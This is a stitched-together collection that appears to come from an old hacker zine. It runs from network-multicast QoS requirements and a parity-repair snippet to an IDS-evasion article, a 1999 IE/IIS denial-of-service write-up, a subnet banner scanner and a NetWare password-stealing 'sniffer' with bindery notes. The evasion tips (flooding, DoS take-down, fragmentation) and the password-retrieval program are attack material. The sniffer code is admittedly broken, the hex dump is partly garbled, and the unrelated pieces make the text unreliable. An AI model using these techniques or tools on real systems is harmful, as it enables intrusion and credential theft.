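    """received maps packet index (0..k) to payload for the packets that
    arrived.  Returns the k data packets, rebuilding at most one missing
    packet from the others; returns None if more than one was lost."""
    missing = [i for i in range(k + 1) if i not in received]
    if len(missing) > 1:
        return None                      # beyond what one parity can repair
    if missing:
        size = len(next(iter(received.values())))
        rebuilt = bytes(size)
        for p in received.values():      # XOR of the survivors is the lost one
            rebuilt = _xor(rebuilt, p)
        received = dict(received)
        received[missing[0]] = rebuilt
    return [received[i] for i in range(k)]


def demo(drop: List[int]) -> Optional[List[bytes]]:
    """Encode four constructed 8-byte packets, drop the given indices in
    transit, and attempt recovery at the receiver."""
    data = [b"pkt0....", b"pkt1....", b"pkt2....", b"pkt3...."]   # constructed
    block = encode_block(data)           # five packets on the wire
    arrived = {i: p for i, p in enumerate(block) if i not in drop}
    return recover_block(arrived, len(data))


if __name__ == "__main__":
    print("no loss      :", demo([]))
    print("lost packet 2:", demo([2]))      # repaired from the parity
    print("lost 1 and 3 :", demo([1, 3]))   # None: needs retransmission
```

The noisier the channel, the smaller k (or the more parity packets) must be, which is the "noisier channels require more redundancy" statement above in code form.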
3.6.6 Capacity

The QoS throughput parameter dictates a certain network level capacity. For example, a video conference might specify a throughput requirement of 1 Mbps. The network QoS mechanism would need to choose a capacity range above 1 Mbps. The communication environment, however, might limit the application to a certain capacity; therefore, this parameter is also communication channel dependent.

4.0 Applications

There are many different user applications that could be specified as using data transmission protocols. They have been developed to meet different mission requirements; however, as a combined group, they could have common or different requirements for the communication channel based on the need of a specific mission requirement. Rather than look at the requirements for the user application as defined in a specific mission, the user application's data transmission requirements can be generalized in terms of the type of data to be transferred. These data types are:

  a. Text Message/Email
  b. File/Image Data Exchange
  c. Voice/Video Conference
  d. Voice/Video Broadcast
  e. Interactive Multi-Media
  f. Time-sensitive Data Exchange
  g. Time-critical Data Exchange
  h. Replicated Data Base

It is helpful to map military applications in each of these classes to commercial applications:

  Generic Application      Commercial Applications             Military Applications
  -----------------------  ----------------------------------  ----------------------
  Text Messaging/Email     Email, News, WWW                    DMS, JMCIS, GCCS, APS
  File/Image               Weather maps (imm)                  JMCIS, GCCS, DMS
  Conference               vic, vat, wb                        VTIXS
  Broadcast                public radio, freeway traffic       JDISS, JMCIS
  Interactive Multimedia   vic, vat, wb                        GCCS
  Time-sensitive           virtual games, stock quotes         JMCIS
  Time-critical            air traffic control, stock quotes   combat systems
  Realtime DB              distributed process, stock quotes   JMCIS

In the sections that follow, each application is evaluated according to the characteristics chart developed previously. It is not possible for the project to address each of these applications or application classes.
The project's focus will be limited to non-realtime applications like bulk file transfer.

4.1 Text Messaging/Email

4.1.1 Application Use

Applications in this category include official organizational messages, email, message paging, facsimile, bulletin boards, and newsgroups. X.400 email is the prototypical application in this category and is characterized by traffic that is not sensitive to throughput or delay, but is sensitive to errors, i.e. it needs reliable transfer. The reliability, however, may be provided immediately or delayed due to the inability of the receiver to acknowledge in circumstances where the return channel is disabled or unavailable. For this reason an unreliable multicast must be provided in addition to a reliable multicast capability. In fact, a hybrid is needed such that when a message is multicast to a group, some members of the group can be expected to acknowledge immediately and others may have to provide for their own reliability by enlisting the services of a logging agent or other means. Email could be sent between individuals or from an individual to a group or organization. Messages of varying priority require a range of guaranteed delivery speeds. This range, reflected in the accompanying chart, is typically from a couple of seconds to hours.

4.1.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   PT->MP
  Scalability                100
  Ordering                   Source
  Reliability Range          Absolute
  QoS
    Throughput               3 Mbps
    Latency                  per-message: 2 secs. to hours
    Jitter                   no requirement
    Precedence/Priority      Per-message
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.2 Text and Image File Transfer

4.2.1 Application Use

Applications in this category include image/file archive/retrieval, the distribution of weather maps, and the distribution of key management and other databases.
(Also, web cache preload, software dissemination, network news, pre-loading of a database for DIS or games.) A typical application is non-realtime bulk data transfer such as the retrieval of an image from an archive. These applications fit a client/server model in that the receiver can be the client of a server, the transmitter. The data flow in these applications is unidirectional. No hierarchical distribution system is needed. The characteristics are not (particularly) delay sensitive but are error sensitive. File sizes are large. In some cases, files must be dealt with as monolithic. Transfers on the order of tens of seconds are tolerated. Image files require very low error rates. Compression is necessary. Since there is no interaction, users do not perceive round-trip delays or excessive latencies.

4.2.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Unknown
  Topology                   PT->MP
  Scalability                1000
  Ordering                   Source
  Reliability Range          k-reliability
  QoS
    Throughput               10 Kbps
    Latency                  no requirement
    Jitter                   no requirement
    Precedence/Priority      Per-message
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.3 Voice/Video Teleconference

4.3.1 Application Use

Voice/video teleconferences impose soft real-time constraints on the communication system. Latency is the principal concern because of human perception limitations. Reliability is not a principal concern since data is redundant and depends more on freshness. Loss of video data transmission, for example, may result in slight differences in color or a fuzzy picture. There is no state to maintain or distribute since audio/video consists of a stream of transition states. Depending on the quality of signals transmitted, throughput demands can be very high.
Telephony quality voice, for example, demands only 64 Kbps, while transmitting NTSC video at 30 frames a second could require a full FDDI level of 100 Mbits/sec. Compression is typically used to lower this throughput requirement. The distribution of this type of data does require the reserving of net resources for the purpose of assuring a QoS level where, typically, latency and jitter are the constraints.

Video teleconference requires a group formation policy that allows initiating a session, joining existing sessions, leaving a session without tearing it down if any participants remain connected, and terminating the session. It requires the capability to conduct a tightly-controlled N x N session if the number of participants is restricted, or a loosely-controlled 1 to N session where the number of participants may be quite large. In any case, control over group membership must be available.

4.3.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   MP<->MP
  Scalability                15
  Ordering                   Causal
  Reliability Range          best effort
  QoS
    Throughput               64 Kbps - 1 Mbps
    Latency                  1 sec.
    Jitter                   125 ms.
    Precedence/Priority      per-session
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.4 Voice/Video Broadcasting

4.4.1 Application Use

The broadcasting of voice and video differs from the VTC in its requirements since there is no need to provide a return channel from the receivers to the transmitter. The non-interactive nature also imposes less stringent demands for latency and jitter.
Digital video and audio require periodic updates of information to prevent the image or voice playback from degrading.

4.4.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   PT->MP
  Scalability                1000
  Ordering                   Causal
  Reliability Range          best effort
  QoS
    Throughput               64 Kbps - 1 Mbps
    Latency                  5 secs
    Jitter                   1 sec.
    Precedence/Priority      per-session
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.5 Interactive Multimedia

4.5.1 Application Use

Collaborative work tools, planning tools and distributed whiteboards are examples of interactive multimedia applications. A distributed whiteboard is a conferencing tool that distributes pages of a whiteboard such that any participant can draw on any page. The goal is to have consistent views across multiple platforms; therefore, the processes implementing the whiteboard must exchange the current state of the data. The operations that any participant performs on a page must be sequenced and timestamped. Each participant is both sender and receiver. Each member is responsible for detecting loss and reporting this to the group, and for periodically informing the group of their place in the session. Repair requests could be multicast to the group and any member of the group could effect repair. This, in turn, requires the members of the group to have some concept of the distance to each participant in the group and to invoke an algorithm for repair that minimizes responses to repairs. This can be satisfied by timestamping the status information multicast to the group. Priority is utilized to determine the importance of transmitting the current page, a new page, or repairs to a previous page. Data in these applications are characterized as reliable, duplicate free, ordered by source, and delivered within a finite period of time.
4.5.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   MP<->MP
  Scalability                15
  Ordering                   Causal
  Reliability Range          Absolute
  QoS
    Throughput               64 Kbps - 1 Mbps
    Latency                  150 ms.
    Jitter                   .125 ms.
    Precedence/Priority      per-session
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.6 Time-Sensitive Data Exchange

4.6.1 Application Use

Distributed simulations, situational awareness, virtual reality gaming, billing distribution, and the dissemination of stock quotes are examples of real-time data exchanges in this category. Soft real-time means that the applications are time sensitive (as opposed to hard real-time, which are time critical). Any virtual environment among hosts in a distributed system that are simulating the behavior of objects in that environment fits this category. Applications like distributed gaming and virtual reality require that terrain and environmental updates be distributed in a multicast fashion with low packet loss and low latency. Objects in this environment are capable of physical interaction and can sense each other by visual and other (sensor) means. These applications are characterized by large-scale memberships which need to share a consistent view of the game space even in the face of packet loss. In entertainment scenarios the number of simulated objects could exceed 100,000, where each object produces a realtime flow of 15 packets per second. Unlike applications like videoconferencing, these applications cannot tolerate frequent updates of data to guarantee freshness. Freshness is required, yet updates are necessarily infrequent for objects like terrain updates. These applications are intended to work with input to and output from humans interacting with distributed simulators in real time. Human perception is the normal quantifier of latency requirements (approx. 100 milliseconds).
Loss rates are stringent but not zero, which means that semi-reliable transfer may suffice. Latency must be predictable on the order of a few hundred milliseconds and jitter must not exceed a few milliseconds. There must be support for reserving network resources. Group communication must allow all participants to transmit to all other participants, and the group management must allow hundreds of participants to join/leave in less than a second.

4.6.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   MP<->MP
  Scalability                100,000
  Ordering                   Causal
  Reliability Range          Absolute
  QoS
    Throughput               45 Mbps - 600 Mbps
    Latency                  150 ms.
    Jitter                   .125 ms.
    Precedence/Priority      per-message
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.7 Time-Critical Data Exchange

4.7.1 Application Use

Air traffic control, realtime sensor systems, and combat data systems are examples of applications in this category.

4.7.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   MP<->MP
  Scalability                500
  Ordering                   Causal
  Reliability Range          Absolute
  QoS
    Throughput               kbps-Mbps
    Latency                  20 ms.
    Jitter                   10 ms.
    Precedence/Priority      per-session
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

4.8 Replicated Data Base

4.8.1 Application Use

Distributed process control and replicated databases are in this category. The distinguishing requirement is the need for total order. Application tasks could be divided among processors in a system and data replicated to protect against failures. There is a need to coordinate the tasks and reach consensus on state. Manufacturing process control needs to schedule processes distributed across the system. A consistent database is necessary to reach consensus.
4.8.2 Communication Requirements

  Characteristic:            Range of Values:
  --------------------------------------------------------------------------
  Group Management           Known
  Topology                   MP<->MP
  Scalability                100,000
  Ordering                   Total
  Reliability Range          Absolute
  QoS
    Throughput               56 Kbps - 1 Mbps
    Latency                  1 sec
    Jitter                   10 ms.
    Precedence/Priority      per-message
    Reliability              communication channel dependent
    Capacity                 communication channel dependent

[-------------------------------------]

kv[6]; /* Intrusion Detection Systems......................ProtocolD */

INTRODUCTION

Intrusion Detection Systems, commonly known as IDS, are a relatively new type of technology. In short, an IDS simply listens in real time for known 'hack' signatures within the data packets. Currently there are two types of IDS systems on the market: Network Based IDS and Host Based IDS. This article will attempt to explain the difference between Network and Host based IDS. Although there are many ways to analyze traffic on a network IDS, I will explore the possibilities of evading one of these methods, known as 'passive network packet capture' (sniffing).

NETWORK IDS :

This method of detection puts your network card into promiscuous mode and sniffs all traffic going by on the wire.

Problems: Due to the fact that it must analyze all traffic passing by, many claim that it cannot be done effectively on a saturated high-speed link without dropping packets. Because it sniffs the traffic, it can only analyze the traffic on its own segment. Thus, in a switched environment, you will require an IDS on each segment.

HOST IDS :

This method examines only the traffic destined to itself.

Problems: Can only analyze the traffic destined to itself. This method requires a client on each host and can become costly.

METHODS OF (Network Based)

The first problem of course relies on the ability of first detecting a Network IDS system.
This is possible by attempting to detect if there are any systems on the network in promiscuous mode. If this is detected, it could either be a sniffer or a network based IDS. Either way, your goal would be to take down this system or flood it to the point where packets begin to be dropped. Currently there are utilities out there that attempt to detect network cards in promiscuous mode.

TAKE-DOWN

Many sniffer-based IDS systems will fail open. Once this happens, the attacker can continue on to the targeted host. This can be accomplished through any number of DoS attacks. It should be noted that some systems are resistant to DoS attacks.

EVASION

** By-Pass via Flood

If the network based IDS cannot be taken off line, another possible approach would be to flood the system to the point where it is dropping packets. Once this occurs, it may be possible to then send the actual attack to the desired target with the hope that the IDS system will drop the packet and therefore not be able to detect the signature contained within it.

** Forgery & Fragmentation

Typically an IDS system examines packets and compares their contents to known attack signatures. If the packet can be forged or fragmented properly, it may then be possible to by-pass the IDS. Many IDSs cannot reassemble fragmented packets and compare them to their list of signatures, thus allowing a malicious attack by. Once the packets reach the destined host, they are reassembled and a successful attack is made.

SUMMARY

Basically there are problems associated with each of these technologies. Ideally, the best solution would have both network and host based IDS. It should also be noted that various types of IDSs provide many types of alerting when particular types of attacks occur. This could be in the form of an e-mail, page or SNMP alert. So, if you decide to attempt to DoS the system, an alert of the event still might be made, thus alerting them of suspicious activity.
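The fragmentation problem described under Forgery & Fragmentation, seen from the sensor's side, as an added example that is not part of the article: a per-fragment signature matcher beside one that reassembles the datagram before matching, plus the check a reassembling sensor needs for fragment sets that do not fit together. The signature string, the sample datagram and all function names are constructed for illustration, not taken from any real IDS rule set.

```python
"""Signature matching on fragmented traffic: per-fragment inspection vs.
inspection after reassembly.  Added example, not from the article; the
signature and the traffic are constructed test strings."""
from typing import Dict, List, Optional, Tuple

Fragment = Tuple[int, bytes]            # (offset in the original datagram, payload)

SIGNATURES = [b"TEST-SIGNATURE-1234"]   # constructed placeholder, not a real rule


def match_per_fragment(fragments: List[Fragment]) -> List[bytes]:
    """Naive sensor: looks for signatures inside each fragment on its own."""
    return [s for s in SIGNATURES if any(s in p for _, p in fragments)]


def reassemble(fragments: List[Fragment]) -> Optional[bytes]:
    """Rebuild the datagram from fragments in any arrival order.  Returns None
    when the fragments leave a gap or overlap; a sensor should treat that as
    an anomaly rather than guess, because end hosts resolve overlapping
    fragments in OS-specific ways the sensor cannot know."""
    buf = bytearray()
    for off, payload in sorted(fragments):
        if off != len(buf):
            return None
        buf += payload
    return bytes(buf)


def inspect(fragments: List[Fragment]) -> Dict[str, object]:
    """Reassembling sensor: report matches on the rebuilt datagram, or flag
    the fragment set as anomalous when it cannot be rebuilt cleanly."""
    data = reassemble(fragments)
    if data is None:
        return {"anomaly": "gap-or-overlap", "matches": []}
    return {"anomaly": None, "matches": [s for s in SIGNATURES if s in data]}


def fragment(payload: bytes, size: int) -> List[Fragment]:
    """Split a datagram into fixed-size fragments tagged with their offsets."""
    return [(i, payload[i:i + size]) for i in range(0, len(payload), size)]


def demo() -> Tuple[List[bytes], Dict[str, object]]:
    stream = b"hello TEST-SIGNATURE-1234 world"    # constructed datagram
    frags = fragment(stream, 8)[::-1]              # cut inside the signature, reordered
    return match_per_fragment(frags), inspect(frags)


if __name__ == "__main__":
    per_fragment, reassembled = demo()
    print("per-fragment matches:", per_fragment)   # [] : signature never whole in one fragment
    print("after reassembly    :", reassembled)    # signature found
    print("overlap handling    :", inspect([(0, b"abcd"), (2, b"cdef")]))
```

The per-fragment matcher never sees the signature because no single fragment contains it whole; the reassembling matcher does, which is why reassembly (and flagging of overlapping or gapped fragment sets) belongs in a network sensor rather than being left to the destination host.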
Also note that one method of preventing an IDS from being detected and/or taken down is to assign the network card an address of 0.0.0.0. This will still enable it to sniff the traffic without being detected, and there is no way of directing an attack directly at the system. It will then use a second network card to send off any alerts or alarms. This second network card is not in promiscuous mode. With this type of design, it is difficult to detect and disable the IDS system.

[-------------------------------------]

kv[7]; /* Another IE Exploit?.................................ntwak0 */

Potential DoS Attack on NT box with port 80 open
Jul 15 17:37:21 1999
(By NtWaK0, slackette) LOU Efnet #legions

Exploit Plat-Form : I did try on NT server 4.0 + IE5 but I am sure it will work with IE4

Exploit Description : All that you need to have is a box with 9x or NT + IE5 on it. Even fully patched. The box tested was a server that ran anonymous FTP, had port 80 open and served ASP pages on that web. The tester may be able to use either NT or 9x to facilitate this exploit. Narrative will follow detailing steps taken.

1- Open IE5 or IE4 and click Options, then Security; NO to cookies, to ActiveX and to Java. In other words, put your security to Maximum.
2- From the Start menu click START then RUN.
3- Type the IP address example, hit enter.
4- If the remote page has an ASP page you will see your title bar switching between the two ASPs. Your IE title bar will go nuts and you will start getting packets from the remote server. This is what I received from the sniffer when the server started sending. The default page didn't load and never loaded. If you do not stop IE you will receive those packets numerous times and your link will be substantially slowed.

  47 45 54 20 2f 64 65 66 61 75 6c 74 2e 61 73 70   GET /default.asp
  3f 20 48 54 54 50 2f 31 2e 31 0d 0a               ? HTTP/1.1..
  41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69   Accept: image/gi
  66 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d   f, image/x-xbitm
  61 70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20   ap, image/jpeg,
  69 6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70   image/pjpeg, app
  6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d   lication/vnd.ms-
  70 6f 77 65 72 70 6f 69 6e 74 2c 20 61 70 70 6c   powerpoint, appl
  69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65   ication/vnd.ms-e
  78 63 65 6c 2c 20 61 70 70 6c 69 63 61 74 69 6f   xcel, applicatio
  6e 2f 6d 73 77 6f 72 64 2c 20 2a 2f 2a 0d 0a      n/msword, */*..
  41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a   Accept-Language:
  20 65 6e 2d 75 73 0d 0a                           en-us..
  53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66   Server: Microsof
  74 2d 49 49 53 2f 34 2e 30 0d 0a                  t-IIS/4.0..
  44 61 74 65 3a 20 54 68 75 2c 20 31 35 20 4a 75   Date: Thu, 15 Ju
  6c 20 31 39 39 39 20 32 31 3a 31 31 3a 31 32 20   l 1999 21:11:12
  08 0f 00 70 3a 00 32 30 37 00 32 35 00 2e 30 30   Host: 000.000.00
  32 0 30 30 0d 0a                                  00..
  43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70   Connection: Keep

5- Someone could code a program to exploit this infraction, being able to generate a Denial of Service attack on the remote box, or on the local box where you have memory consumption due to the packets received from the remote site.
6- If you also run a sniffer you will see what the server is sending. I received about 2 Meg of data from the server. The page never loaded, and the only way to stop that data is to close IE.
Exploit Code : N/A
Exploit Fix : N/A

+---------------oOOo-(NtWaK0)-oOOo--------------------------------+

[-------------------------------------]

kv[8]; /* tryseg.c............................................guidob */

// Test for catching the SIGSEGV or SIGBUS without crashing
// and combined with try{}catch(){}
// Guido Bakker 1999
//
// Note: throwing a C++ exception out of a signal handler is not
// guaranteed to work by the language standard; this is an experiment
// that relies on the compiler and platform it was written on.
#include <iostream>
#include <signal.h>   // signal(), psignal()
#include <stdio.h>
#include <stdlib.h>

using namespace std;

struct report {
    int err;
    int sig;
    int critval;
} page1 = { 0, 0, 0 };

void notwithme(int);
int beyond(int);

int main(){
    int i;
    try{
        // the original used sigset(); signal() is the portable spelling
        signal(SIGSEGV, notwithme);
        signal(SIGBUS, notwithme);
        for(i=10000;;i++){
            beyond(i);
            cout << "Survived beyond i = " << i << endl;
        }
    }
    catch(report& seite1){
        cout << "Yes we made it into the catch()" << endl;
        cout << "seite1.err is: " << seite1.err << endl;
        cout << "seite1.sig is: " << seite1.sig << endl;
        cout << "seite1.critval is: " << seite1.critval << endl;
        return(0);
    }
    catch(...){
        cout << "Came to the second catch()" << endl;
        return(1);
    }
    cout << "After the catch block" << endl;
    return(1);
} // end of main()

int beyond(int i){
    int a[50];
    page1.critval = i;
    // Main operation which causes an unforeseen error:
    // writes far outside the 50-element array on purpose
    a[i]=1;
    return(1);
}

void notwithme(int sig){
    psignal(sig, "Function notwithme() got signal: ");
    page1.err = 1;
    page1.sig = sig;
    throw page1;   // unwinds out of the handler into main()'s catch
}

[-------------------------------------]

kv[9]; /* match.c..............................................icesk */

/* by icesk HEH damn i think i've released to many scanners :> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TIMEOUT 3

void al4rm(int sig);

int main(int argc, char **argv)
{
    struct sockaddr_in thaddr;
    struct sigaction sa;
    int unf, i, n;
    char buf3r[1024], hozt[1024];

    if(argc != 4) {
        printf("icesk; %s [ip mask] [port] [searchword]\n", argv[0]);
        exit(0);
    }

    /* install the alarm handler once, without SA_RESTART, so that the
       alarm really interrupts a hanging connect() or recv() */
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = al4rm;
    sigaction(SIGALRM, &sa, NULL);

    for(i = 1; i < 255; i++) {
        if((unf = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            printf("c4nt g3t s0ck3t!#@\n");
            continue;
        }
        /* build the host string before converting it (the original called
           inet_addr(hozt) before hozt had been filled in) */
        sprintf(hozt, "%s.%d", argv[1], i);
        thaddr.sin_family = AF_INET;
        thaddr.sin_port = htons(atoi(argv[2]));
        thaddr.sin_addr.s_addr = inet_addr(hozt);
        bzero(&(thaddr.sin_zero), 8);

        alarm(TIMEOUT);
        n = -1;
        if(connect(unf, (struct sockaddr *)&thaddr, sizeof(struct sockaddr)) == 0)
            n = recv(unf, buf3r, sizeof(buf3r) - 1, 0);
        alarm(0);

        if(n > 0) {
            buf3r[n] = '\0';   /* terminate before strstr() looks at it */
            if(strstr(buf3r, argv[3]) != NULL)
                printf("[%s!%s]; *MATCH*\n", hozt, argv[2]);
        }
        close(unf);
    }
    return 0;
}

void al4rm(int sig)
{
    (void)sig;   /* only needed to make connect()/recv() return EINTR */
}

[-------------------------------------]

kv[10]; /* netsniff.c (reprint)..............................mnemonic */

------------------------------ begin here ------------------------------
/* NetWare Sniffer 1.0 written by Mnemonic */
/* Reprinted as-is apart from layout and obvious syntax slips (missing
   semicolons and braces, a mistyped free() and realloc() argument).  It
   needs the NetWare client SDK headers and "structs.h" from the kv5
   notes, and several call sites (GetObjectData(), GetUserAndAppInfo(),
   main()) do not match the prototypes below, so it does not build as
   printed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
/* NetWare SDK bindery and connection service headers go here */
#include "structs.h" /* this is at the bottom of my notes in kv5 */

void GetMyAccountPassword();

int main()
{
    char imthinkn;

    printf("NetWare Sniffer is copyright 1998 Mnemonic, little buddy\n");
    printf("Would you like to (a) get the password for the account you're\n");
    printf("on now, (b) get the password of another user or application\n");
    printf("or (c) quit? ");
    scanf(" %c", &imthinkn);   /* the reprint printed imthinkn instead of reading it */

    switch (imthinkn) {
    case 'a':
    case 'A':
        GetMyAccountPassword();
        break;
    case 'b':
    case 'B':
        GetObjectData();
        break;
    case 'c':
    case 'C':
        return 3;
    }
    return 0;
}

FORWARD int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(WORD wConnectionNumber);
FORWARD OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType);

GLOBAL OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType)
{
    int nIndex;
    int nNumberObjects = 0;
    OBJECT *pObject = NULL;
    OBJECT obj;
    int nCompletionCode;

    obj.oid = -1L; /* initial value for ScanBinderyObject.
                      must be -1L, gets updated by the function. */
    for (;;) {
        nCompletionCode = ScanBinderyObject(pszObjectName, wObjectType,
                                            &obj.oid, obj.szObjectName,
                                            &obj.wObjectType, &obj.byPropertiesFlag,
                                            &obj.byObjectFlag, &obj.byObjectSecurity);
        if (nCompletionCode != SUCCESSFUL) { /* problem or finished */
            if (nCompletionCode != NO_SUCH_OBJECT) {
                if (pObject != NULL)
                    free(pObject);
                errno = nCompletionCode;
                return NULL;
            }
            break;
        }
        nIndex = nNumberObjects++;
        pObject = (OBJECT *) realloc(pObject, (nNumberObjects * sizeof (OBJECT)));
        if (pObject == NULL)
            return NULL;
        /* do structure assignment to fill array element. */
        pObject[nIndex] = obj;
    } /* end for (;;) */

    /* add dummy element */
    pObject = (OBJECT *) realloc(pObject, ((nNumberObjects + 1) * sizeof (OBJECT)));
    if (pObject != NULL)
        /* zero out the dummy element. */
        memset(&pObject[nNumberObjects], '\0', sizeof (OBJECT));
    if (nNumberObjects == 0)
        errno = NO_SUCH_OBJECT;
    GetUserAndAppInfo();
}

GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject)
{
    /* GetConnectionNumber() returns a value rather than an error code so
       we can use it as an input parameter to GetConnInfo(). */
    if (pFSConnInfo == NULL)
        return -1;
    strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
    aop->obj.wObjectType = OT_APPLICATION;
    strcpy(aop->szPassword, argv[nMaxArgs - 1]);
    fread(&szPassword, sizeof(int), 1, inpf);
    printf("\nThe password for that account is ", szPassword, "\n");
    printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
    main();
    return 2;
}

void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject)
{
    FS_CONNECTION_INFO *pFSConnInfo;

    pFSConnInfo = GetConnInfo(GetConnectionNumber());
    if (pFSConnInfo == NULL)
        return -1;
    /* we have the user information in pFSConnInfo->fsLoggedObject.obj. */
    *pObject = pFSConnInfo->fsLoggedObject.obj;
    free(pFSConnInfo);
    strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
    aop->obj.wObjectType = OT_APPLICATION;
    strcpy(aop->szPassword, argv[nMaxArgs - 1]);
    fread(&szPassword, sizeof(int), 1, inpf);
    printf("\nThe password for the account you're on is ", szPassword, "\n");
    printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
    main();
    return 1;
}
------------------------------- end here -------------------------------

NetWare Sniffer allows you to do one of two things. You can get the password for the account you're on, or get the password for another object. NWS actually retrieves the 128-byte segment which represents an object's password, and then converts this binary string into text.

To receive the password for the account you're on, we use functions in the Connection Services. So we can call GetConnectionNumber() to get the number that the file server has assigned to this workstation's connection, and call GetConnInfo() to get the name of the user among other information, including the password.

To get the password for another object we first have to get the name of the object. NWS uses the function GetObjectData(), which uses ScanBinderyObject() to populate a structure of type OBJECT. ScanBinderyObject() can be used to retrieve data for more than one object at a time, but will probably end up screwing things up if you try it. The object name argument can contain wildcards (* or ?), and the object type may be passed as OT_WILD. An object name of * and an object type of OT_WILD means return every object in the bindery, which will also screw you up.
Because of this, GetObjectData() returns a pointer to an array of OBJECT structures. The last element is a dummy with all fields cleared to 0, so a caller can walk the array until it reaches an empty object name. NWS then hands the first element to GetUserAndAppInfo().

The bindery is a database where NetWare keeps information about network resources and users; many function groups use it to store and retrieve information. Each file server on a network has its own bindery, and thus its own group of known objects. The bindery represents objects using object IDs, which are system-generated long (four-byte) integers. NetWare stores them in high-low order (most significant byte first), so on a little-endian PC an ID read straight out of a segment must be byte-swapped before it is compared as a long. The object ID serves as a handle to object information. The object type identifies the role the object plays in the network environment. Novell reserves type numbers up to 0x8000 for well-known types; structs.h below defines its own type, OT_APPLICATION, as 0x8001.

Each object may in turn possess identifying characteristics, known as properties. Properties can be either items, which are stored as 128-byte segments of unformatted data, or sets, which are lists of object IDs. Properties are either static or dynamic, and have read/write security protection. Properties have these attributes. The property name is a character string of up to 16 characters, including the null terminator; property names have the same restrictions on use of characters as object names. The property flags are stored as a one-byte field; they indicate whether the property is static or dynamic, and whether it is an item or a set. Item properties are unformatted binary fields stored in 128-byte segments which are interpreted by applications or NetWare APIs; sets are lists of object IDs, which are interpreted by NetWare. The property security plays the same role for properties as object security does for objects. The values flag indicates whether the property has been assigned a value.

Properties are dependent on objects, which have these attributes:

    OBJECT ID
    OBJECT NAME
    OBJECT TYPE
    OBJECT FLAG
    OBJECT SECURITY
    PROPERTIES FLAG

There are two ways of identifying objects: by OBJECT ID, or by OBJECT NAME and OBJECT TYPE together. These are the property attributes:

    OBJECT ID
    PROPERTY NAME
    PROPERTY FLAGS
    PROPERTY SECURITY
    VALUES FLAG

NetWare stores items and sets as 128-byte segments of binary data. With item data, a segment contains anything an application wants it to; with set data, a segment holds 32 object IDs. An item property can only be represented as a variable-length binary, or RAW, column. The only other column we need is the object ID, so we know who the property belongs to. The structure of the set property table becomes clear if we think about what it represents. For example, the properties GROUPS_I'M_IN and GROUP_MEMBERS are used by NetWare to track group membership. A user object may belong to any number of groups, and a user group object may contain any number of users. These properties express a relationship of the OBJECTS table with itself. PASSWORD is of type item, and would be structured thus:

    OBJECT ID
    SEGMENTS
    DATA

A set property is just an array of OBJECT_IDs. With both item properties and set properties we don't know how many segments we will retrieve, so we declare pointers to the values and allocate memory for them as they arrive.
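The set-segment layout described above, as an added example that is not from the article, from structs.h below or from the Novell SDK: it packs and unpacks 128-byte set segments holding 4-byte object IDs in high-low order, and answers the GROUP_MEMBERS question the text uses, whether a given object ID appears in a set that spans more than one segment. The zero-padding of unused slots and the fake 0x010000xx object IDs are assumptions made for the example; nothing here talks to a server.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define SEGMENT_SIZE        128
#define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / 4)   /* 32 object IDs per set segment */

typedef uint32_t OBJECT_ID;

/* Object IDs sit in a segment high-low (most significant byte first), so
   they are assembled byte by byte instead of being read through a long *. */
static OBJECT_ID read_oid(const unsigned char *p)
{
    return ((OBJECT_ID)p[0] << 24) | ((OBJECT_ID)p[1] << 16) |
           ((OBJECT_ID)p[2] << 8)  |  (OBJECT_ID)p[3];
}

static void write_oid(unsigned char *p, OBJECT_ID oid)
{
    p[0] = (unsigned char)(oid >> 24);
    p[1] = (unsigned char)(oid >> 16);
    p[2] = (unsigned char)(oid >> 8);
    p[3] = (unsigned char)oid;
}

/* Decode one set segment into out[]. An all-zero slot is treated as unused
   (assumption). Returns the number of IDs found, 0..32. */
int decode_set_segment(const unsigned char *seg, OBJECT_ID *out)
{
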